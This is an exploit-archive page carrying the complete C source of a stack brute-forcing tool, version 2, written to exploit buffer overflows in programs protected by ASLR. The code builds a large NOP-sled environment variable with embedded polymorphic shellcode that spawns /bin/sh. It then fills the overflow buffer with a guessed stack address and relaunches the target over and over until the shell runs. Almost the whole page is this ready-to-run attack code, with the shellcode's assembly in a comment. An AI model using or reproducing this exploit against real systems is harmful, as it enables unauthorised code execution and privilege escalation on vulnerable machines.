what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Stack Brute Forcing Utility 2

Stack Brute Forcing Utility 2
Posted Aug 3, 2010
Authored by gunslinger | Site gunslingerc0de.wordpress.com

Stack bruteforcing utility against buffer overflow programs with ASLR. Provides polymorphic shellcode for /bin/sh.

Changes: This very does not use its own return address.
tags | overflow, shellcode
SHA-256 | 41324aa26a2899c6b478763eea34dce39538d67bddad2a8fb2d07a1ce362268a

Stack Brute Forcing Utility 2

Change Mirror Download
/*
* stack brute forcer by Gunslinger_ yudha.gunslinger@gmail.com
* This is version 2 of stackbf.c
* The difference is we doesn't use our own return address , because some asm that copied %esp register into %eax register
* This return value can be use with good accuracy, so we use for that .
*
* # original assembly of shellcode, but there is has been encoded to polymorphic shellcode for hidding some character like "\xcd\x80" or "int $0x80" in assembly
* .global _start
* _start:
*
* xor %eax, %eax
* xor %ebx, %ebx
* xor %ecx, %ecx
* xor %edx, %edx
*
* mov $0xb, %al
* push %ebx
* push $0x68732f2f
* push $0x6e69622f
* mov %esp, %ebx
* xor %edx, %edx
* xor %edx, %edx
* push %ebx
* int $0x80
*
* inc %eax
* int $0x80
*
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90

/* Length of environment variable ~ 128 Kb */
#define ENV_LEN 128000

static inline getesp()
{
__asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}


char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x35\x80\xe9\x01" /* Polymorphic shell */
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\xfe"
"\x66\x07\xe5\x40\x88\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3"
"\xbe\x18\x66\x07\x66\xfe\x88\x02\xb5\x75\x02\xb5";

int main(int argc, char **argv)
{
char *application = NULL;
char *buffer = NULL;
char env_var[ENV_LEN];
char *env[2] = { env_var, NULL};
int *p, num, ret, pid, payload_size;

if (argc < 3)
{
printf("\nStack Brute Force");
printf("\nProgrammer : Gunslinger_");
printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
exit(1);
}

printf("[*] Using return address 0x%x \n", getesp());
printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
printf("[*] Shellcode size %d bytes\n", strlen(shellcode));

application = strdup(argv[1]);
payload_size = atoi(argv[2]);
buffer = (char*) malloc(payload_size);

memset (env_var, NOP, ENV_LEN);

memcpy (env_var+ENV_LEN-strlen(shellcode)-1, shellcode, strlen(shellcode));
env_var[ENV_LEN-1]=0;

p = (int*) buffer;

for (num = 0; num < payload_size; num += sizeof(int), p++)
*p = getesp();
*p=0;
do {
switch(pid=fork())
{
case 0:
execle (application, application, buffer, NULL, env);
exit(0);
break;
default:
waitpid (pid, &ret, 0);
break;
}
}
while (ret);
}
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close